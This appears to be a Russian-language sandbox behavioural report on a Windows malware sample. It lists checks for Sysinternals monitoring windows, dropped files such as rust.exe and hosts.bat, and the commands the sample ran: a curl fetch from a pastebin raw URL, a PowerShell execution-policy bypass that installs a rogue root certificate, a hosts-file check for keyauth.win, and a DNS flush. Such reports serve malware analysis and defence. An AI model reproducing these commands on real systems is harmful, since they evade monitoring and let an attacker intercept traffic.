Техническая информация
- ClassName: 'FilemonClass', WindowName: ''
- ClassName: '', WindowName: 'File Monitor - Sysinternals: www.sysinternals.com'
- ClassName: 'PROCMON_WINDOW_CLASS', WindowName: ''
- ClassName: '', WindowName: 'Process Monitor - Sysinternals: www.sysinternals.com'
- ClassName: 'RegmonClass', WindowName: ''
- %TEMP%\aut1cb4.tmp
- %TEMP%\rust.exe
- %TEMP%\aut1e3b.tmp
- %HOMEPATH%\appdata\hosts.bat
- nul
- %TEMP%\aut1cb4.tmp
- %TEMP%\aut1e3b.tmp
- %HOMEPATH%\appdata\hosts.bat
- %TEMP%\rust.exe в <Текущая директория>\drtajmntzzw3i21k .exe
- ClassName: 'Registry Monitor - Sysinternals: www.sysinternals.com' WindowName: ''
- ClassName: '18467-41' WindowName: ''
- '%TEMP%\rust.exe'
- '%WINDIR%\syswow64\cmd.exe' /c %HOMEPATH%\AppData\hosts.bat' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c %HOMEPATH%\AppData\hosts.bat
- '%WINDIR%\syswow64\cmd.exe' /c curl -s https://pastebin.com/raw/sD69ivJ5
- '%WINDIR%\syswow64\cmd.exe' /S /D /c" echo "
- '%WINDIR%\syswow64\findstr.exe' /R "^[0-9]*\.[0-9]*\.[0-9]*\.[0-9]*$"
- '%WINDIR%\syswow64\certutil.exe' -store TrustedRoot
- '%WINDIR%\syswow64\findstr.exe' /i /c:"%HOMEPATH%\AppData\server.crt"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -Command "Import-Certificate -FilePath '%HOMEPATH%\AppData\server.crt' -CertStoreLocation 'Cert:\LocalMachine\Root' -ErrorAction SilentlyContinue"
- '%WINDIR%\syswow64\findstr.exe' /C:" keyauth.win" "<DRIVERS>\etc\hosts"
- '%WINDIR%\syswow64\ipconfig.exe' /flushdns